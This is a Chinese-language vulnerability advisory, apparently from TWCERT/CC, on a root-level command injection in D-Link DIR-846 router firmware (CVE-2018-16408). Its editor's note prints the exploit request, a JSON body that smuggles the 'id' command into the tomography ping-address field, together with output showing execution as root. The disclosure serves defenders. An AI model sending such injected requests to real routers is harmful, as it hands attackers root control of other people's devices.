友訊無線路由器DIR-846韌體破綻招致RCE
- 發布單位:TWCERT/CC
- 更新日期:2019-04-03
- 點閱次數:573
CVE編號
內文
●概述:
D-Link開發WIFI網路產品(型號:DIR-846),近日被galaxylab的研究者bigbear測試出韌體漏洞,只要駭客獲得admin帳號連線cookies,可製作惡意http request,針對網路狀態斷層掃描(SetNetworkTomographySettings)進行參數設定,且探勘命令以root權限,成功實施remote command execution,由於官方修補尚無音訊,設備用戶請從密碼強度與白名單方式強化資安管控。
●編註:
有關DIR-846韌體探勘作法,首先進入口網頁(例:http://192.168.0.1),以admin帳號登入,如此一來產生cookies,將成為實際探勘必備元素,接著要對SetNetworkTomographySettings參數設定下手,Tomography意即斷層掃描,能對網路狀態斷層掃描設定做調整,肯定需要系統權限,攻擊者帶著admin所用cookies,發送如下http請求:
{"SetNetworkTomographySettings":{tomography_ping_address":"192.168.0.1:id","tomography_ping_number":"1","tomography_ping_size":"12","tomography_ping_timeout":"","tomography_ping_ttl":""}}
{"SetNetworkTomographySettingsResponse":{"SetNetworkTomographySettingsResult":"OK"}}
結果可知命令執行成功,且執行者還是root身分:
{"GetNetworkTomographyResult":""}
{"GetNetworkTomographyResultResponse":{"tomography_ping_result":"uid=0(root)gid=0(root)\n","GetNetworkTomographyResultResult":"OK"}}
影響產品
解決辦法
相關連結
- https://github.com/PAGalaxyLab/VulInfo/blob/master/D-Link/DIR-846/RCE_0/D-Link%2520DIR-846%2520RCE.m
- https://raw.githubusercontent.com/PAGalaxyLab/VulInfo/master/D-Link/DIR-846/RCE_0/dlink2.png
- https://raw.githubusercontent.com/PAGalaxyLab/VulInfo/master/D-Link/DIR-846/RCE_0/dlink1.png
- https://nvd.nist.gov/vuln/detail/CVE-2018-16408
- http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-846
- https://github.com/PAGalaxyLab/VulInfo/tree/master/D-Link/DIR-846/RCE_0
- http://2a.zol-img.com.cn/product/191/126/ce9CRahcdVZUc.jpg